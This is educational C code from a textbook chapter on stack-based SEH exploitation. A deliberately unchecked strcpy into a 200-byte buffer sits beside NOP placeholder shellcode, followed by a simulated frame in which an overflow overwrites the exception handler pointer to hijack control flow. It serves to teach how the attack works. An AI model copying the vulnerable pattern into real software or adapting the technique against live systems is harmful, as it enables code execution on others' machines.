Note: move the strcpy call ahead of the __asm int 3 statement, otherwise you will not see the 90909090 data at address 0x002FE98; I was stuck on this for a whole afternoon.
/*****************************************************************************
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code for chapter 7.2 of the book "Vulnerability Exploit and Analysis Technique"
file name : SEH_stack.c
author : failwest
date : 2007.07.04
description : demo of how SEH can be exploited
Notice : 1 only runs on Windows 2000
2 compiled with VC 6.0
3 built as a release version
4 the SEH offset and the shellcode address may need
to be confirmed by runtime debugging
version : 1.0
E-mail : failwest@gmail.com
Only for educational purposes, enjoy the fun of exploiting :)
******************************************************************************/
#include <windows.h>
#include <stdio.h> /* printf, getchar */
/* 192 bytes of 0x90 (NOP): a recognisable pattern for locating buf and the
   SEH record in the debugger before real shellcode is substituted */
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
//"\x90\x90\x90\x90\x90\x90\x90\x90";
/* Filter expression of the __except below: called when the division faults */
DWORD MyExceptionhandler(void)
{
    printf("got an exception, press Enter to kill process!\n");
    getchar();
    ExitProcess(1);
    return EXCEPTION_EXECUTE_HANDLER; /* not reached; satisfies the DWORD return type */
}
void test(char * input)
{
    char buf[200];
    int zero=0;
    /* overrun the stack: no length check, so an input longer than 200 bytes
       runs past buf and over the frame above it, including the SEH record
       that __try installs */
    strcpy(buf,input);
    __asm int 3 /* breakpoint: inspect buf and the SEH record in the debugger */
    __try
    {
        //strcpy(buf,input); //overrun the stack
        zero=4/zero; /* generate an exception so the registered handler is dispatched */
    }
    __except(MyExceptionhandler()){}
}
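The shellcode above is only a NOP pattern for finding the frame layout in the debugger. The C program below is an added example, not part of the book's PoC, that simulates the step that follows: a copy with no length check runs over the EXCEPTION_REGISTRATION record that __try installed, and when the fault is raised the dispatcher calls through the overwritten handler pointer. It runs on any platform because the frame is modelled as a byte array rather than touching the real Windows SEH chain; the offsets (the record placed 12 bytes past the end of buf), the length-based copy standing in for strcpy, and the stand-in functions legit_handler and fake_shellcode are all assumptions of this demo, and the real offset must still be read off in the debugger as the header says.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed frame layout: buf, some other frame data, then the
 * EXCEPTION_REGISTRATION record that __try installs above it. The offsets are
 * assumptions for this demo; the real VC6 / Windows 2000 numbers come from the debugger. */
enum {
    BUF_SIZE    = 200,                      /* char buf[200]                          */
    SEH_OFF     = BUF_SIZE + 12,            /* start of the EXCEPTION_REGISTRATION    */
    PREV_OFF    = SEH_OFF,                  /*   ->prev: next record in the chain     */
    HANDLER_OFF = SEH_OFF + sizeof(void *), /*   ->handler: the pointer we overwrite  */
    FRAME_SIZE  = HANDLER_OFF + sizeof(void *)
};

typedef void (*seh_handler_t)(void);

static int legit_ran;      /* set by the handler __try registered       */
static int shellcode_ran;  /* set by the stand-in for the injected code */

static void legit_handler(void)  { legit_ran = 1; }
static void fake_shellcode(void) { shellcode_ran = 1; }  /* stands in for NOP sled + shellcode */

/* What __try does on entry: link a record into the chain and set its handler. */
static void register_handler(unsigned char *frame, seh_handler_t h)
{
    void *prev = NULL;                      /* end of chain, enough for the demo */
    memcpy(frame + PREV_OFF, &prev, sizeof prev);
    memcpy(frame + HANDLER_OFF, &h, sizeof h);
}

/* The bug: strcpy(buf, input) with the NUL terminator replaced by an explicit
 * length so the demo can carry the zero bytes of a native pointer (a real
 * strcpy payload must be NUL-free). Nothing checks len against BUF_SIZE. */
static void vulnerable_copy(unsigned char *frame, const unsigned char *input, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        frame[i] = input[i];
}

/* What the dispatcher does when the fault fires: load the handler from the
 * record and call it. After the overflow that pointer is attacker-chosen. */
static seh_handler_t dispatch_exception(const unsigned char *frame)
{
    seh_handler_t h;
    memcpy(&h, frame + HANDLER_OFF, sizeof h);
    if (h) h();
    return h;
}

/* Attacker side: 0x90 filler up to the handler slot, then the jump target. */
static size_t build_payload(unsigned char *out, size_t cap, seh_handler_t target)
{
    size_t len = HANDLER_OFF + sizeof target;
    if (cap < len) return 0;
    memset(out, 0x90, HANDLER_OFF);
    memcpy(out + HANDLER_OFF, &target, sizeof target);
    return len;
}

/* Distance from buf[0] to the handler pointer: the "SEH offset" in the header. */
size_t handler_offset(void) { return HANDLER_OFF; }

/* Handler pointer left in the record once the payload has been copied in. */
seh_handler_t handler_after_overflow(void)
{
    unsigned char frame[FRAME_SIZE] = {0}, payload[FRAME_SIZE];
    seh_handler_t h;
    register_handler(frame, legit_handler);
    vulnerable_copy(frame, payload, build_payload(payload, sizeof payload, fake_shellcode));
    memcpy(&h, frame + HANDLER_OFF, sizeof h);
    return h;
}

/* The whole sequence. Returns 1 if the fault raised after the overflow was
 * delivered to fake_shellcode instead of legit_handler. */
int run_seh_overflow_demo(void)
{
    unsigned char frame[FRAME_SIZE] = {0}, payload[FRAME_SIZE];

    legit_ran = shellcode_ran = 0;
    register_handler(frame, legit_handler);   /* __try on entry to test()          */
    dispatch_exception(frame);                /* a fault now reaches legit_handler */
    if (!legit_ran || shellcode_ran) return 0;
    legit_ran = 0;

    vulnerable_copy(frame, payload, build_payload(payload, sizeof payload, fake_shellcode));
    dispatch_exception(frame);                /* zero = 4 / zero: the dispatcher calls our address */
    return shellcode_ran && !legit_ran;
}

int main(void)
{
    printf("handler offset from buf: %zu, hijack %s\n", handler_offset(),
           run_seh_overflow_demo() ? "succeeded" : "failed");
    return 0;
}
```

In the real exploit the handler slot is not filled with a function's address but with an address that lands in the NOP sled (or a pop/pop/ret stub that leads there), and the payload that follows must avoid NUL bytes because strcpy stops at the first one; the demo takes a length instead so that it can carry a native pointer unchanged.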